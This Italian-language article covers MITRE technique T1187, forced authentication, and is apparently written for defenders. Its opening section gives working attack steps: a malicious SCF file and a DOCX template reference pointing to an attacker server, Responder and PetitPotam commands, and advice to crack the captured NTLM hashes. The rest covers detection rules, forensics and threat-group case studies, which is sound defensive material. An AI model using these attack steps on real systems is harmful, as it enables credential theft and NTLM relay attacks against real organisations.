Forced Authentication: Costringere le Credenziali all'Autenticazione Automatica (T1187)

La creazione di un file SCF malevolo rappresenta il primo passo per testare questa vulnerabilità nel vostro ambiente. Create un file trap.scf con il seguente contenuto:

[Shell]
Command=2
IconFile=\\[vostro-server]\share\icon.ico

Posizionate questo file sul desktop di un utente target o in una share pubblica. Quando Windows renderizza l'icona, invierà automaticamente l'hash NTLM al vostro server controllato.

Per intercettare gli hash, configurate Responder sul vostro sistema di attacco Linux:

sudo responder -I eth0 -wrf

Responder catturerà gli hash NTLMv2 che potrete successivamente craccare offline con hashcat. La bellezza di questa tecnica sta nella sua semplicità: non richiede exploit complessi o vulnerabilità zero-day.

Un approccio più sofisticato prevede l'utilizzo di documenti Office con template injection. Create un documento Word che referenzia un template remoto modificando il file document.xml.rels all'interno del file DOCX:

Target="file://[vostro-server]/Normal.dotm"

Quando la vittima apre il documento, Office tenterà di recuperare il template remoto, inviando le credenziali NTLM. Questa variante è particolarmente efficace negli attacchi di spearphishing poiché il documento appare legittimo.

La funzione EfsRpcOpenFileRaw offre un vettore alternativo per forzare l'autenticazione. Utilizzando tool come PetitPotam, potete inviare richieste SMB all'interfaccia MS-EFSRPC di un sistema remoto:

python3 PetitPotam.py -d [dominio] -u [utente] -p [password] [listener-ip] [target-ip]

Questo metodo è particolarmente potente perché può costringere anche i domain controller a autenticarsi, aprendo la strada ad attacchi di relay NTLM contro l'infrastruttura Active Directory.

La detection efficace di forced authentication richiede correlazione tra eventi apparentemente sconnessi. Il pattern da rilevare segue una sequenza specifica: creazione o modifica di file sospetti, accesso a questi file, seguito da traffico NTLM outbound verso destinazioni non autorizzate.

Configurate Sysmon per monitorare la creazione di file con estensioni a rischio (.scf, .lnk, .url) nelle location sensibili come Desktop, Downloads e cartelle pubbliche. L'EventID 11 di Sysmon cattura questi eventi:

<RuleGroup name="" groupRelation="or">
  <FileCreate onmatch="include">
    <TargetFilename condition="contains any">.scf;.lnk;.url</TargetFilename>
    <TargetFilename condition="contains any">Desktop;Downloads;Public</TargetFilename>
  </FileCreate>
</RuleGroup>

Il monitoraggio del traffico di rete rappresenta il secondo pilastro della detection. Implementate regole che flaggano connessioni SMB (porte 139/445) o WebDAV (80/443 con NTLM) verso IP esterni o non appartenenti ai file server autorizzati.

La correlazione temporale è cruciale: se rilevi un file SCF creato sul desktop di un utente e entro 15-30 minuti osservi traffico SMB verso un IP esterno, hai probabilmente identificato un tentativo di forced authentication. Questo approccio riduce drasticamente i falsi positivi rispetto al semplice monitoraggio del traffico SMB.

Per i documenti Office con template injection, monitorate i processi di Office che effettuano connessioni di rete inusuali. Windows Security Log EventID 4624 (logon riuscito) con logon type 3 (rete) verso destinazioni anomale può indicare autenticazione forzata in corso.

La gestione dei falsi positivi richiede la creazione di whitelist precise per i server legittimi. Documentate tutti i file server autorizzati e i servizi WebDAV enterprise, escludendoli dalle regole di detection per evitare alert storm durante le normali operazioni aziendali.

L'analisi forense di un attacco di forced authentication inizia dall'identificazione dei file esca nelle location strategiche. Il file system NTFS mantiene timestamp dettagliati (MACE) che permettono di ricostruire quando il file malevolo è stato creato o modificato.

Utilizzate MFT parser per estrarre i record dei file sospetti: python3 mft_parser.py -f $MFT -o mft_output.csv

Cercate pattern anomali come file SCF o LNK creati in orari inusuali o da processi non standard. La presenza di riferimenti UNC path verso IP esterni nei metadati dei file rappresenta un indicatore chiave.

Dragonfly ha dimostrato l'efficacia di questa tecnica modificando file LNK esistenti per puntare a risorse esterne. Durante l'analisi, esaminate non solo i nuovi file ma anche le modifiche a file legittimi, particolarmente nelle cartelle di avvio e nei percorsi frequentemente navigati dagli amministratori.

Il registro di Windows mantiene tracce dell'attività SMB nel percorso SYSTEM\CurrentControlSet\Services\LanmanServer\Shares. Le connessioni fallite vengono registrate nel Security log con EventID 4625, mentre i tentativi riusciti generano EventID 4624 con Logon Type 3.

Per ricostruire la timeline completa, correlate i timestamp di creazione/modifica dei file esca con i log di autenticazione di rete. L'analisi del traffico di rete catturato (se disponibile) può rivelare gli hash NTLM trasmessi e confermare l'esfiltrazione delle credenziali.

L'artefatto chiave per identificare template injection è l'analisi dei file Office. Estraete e esaminate i file XML interni cercando riferimenti a template remoti. Tool come olevba possono automatizzare questa ricerca su larga scala.

G0035 (Dragonfly) rappresenta il caso studio principale per forced authentication, avendo perfezionato l'uso di attachment di spearphishing con link a risorse esterne. Il gruppo ha dimostrato particolare interesse per i sistemi virtualizzati, modificando file LNK per raccogliere credenziali da ambienti VMware.

La sofisticazione di Dragonfly emerge nella loro capacità di integrare forced authentication in campagne multi-stadio. Dopo aver raccolto gli hash NTLM, il gruppo tipicamente procede con attacchi di password spraying o tentativi di lateral movement utilizzando le credenziali compromesse.

G0079 (DarkHydrus) ha portato l'innovazione utilizzando Template Injection per lanciare finestre di autenticazione che appaiono legittime agli utenti. Questa variante psicologica aumenta il tasso di successo poiché gli utenti sono più propensi a inserire credenziali in prompt che sembrano provenire da sistemi affidabili.

L'overlap nei tool utilizzati da questi gruppi suggerisce la condivisione di TTP o l'accesso a risorse comuni nel cybercrime underground. S0634 (EnvyScout) emerge come malware condiviso che utilizza protocol handler per forzare risposte di autenticazione NTLMv2, indicando una possibile commoditizzazione di questa tecnica.

I pattern geografici mostrano una predilezione per questa tecnica in operazioni contro infrastrutture critiche e settori industriali, dove la presenza diffusa di sistemi Windows legacy rende l'attacco particolarmente efficace. L'evoluzione futura probabilmente vedrà l'integrazione con tecniche di living-off-the-land per ridurre ulteriormente la detection footprint.

Tecnica documentata nel framework MITRE ATT&CK con evidenze da operazioni reali di Dragonfly e DarkHydrus. Detection basata su analisi comportamentale DET0022 per identificazione di lure file e traffico NTLM anomalo. Mitigazioni validate tramite implementazioni enterprise di traffic filtering e password policies robuste.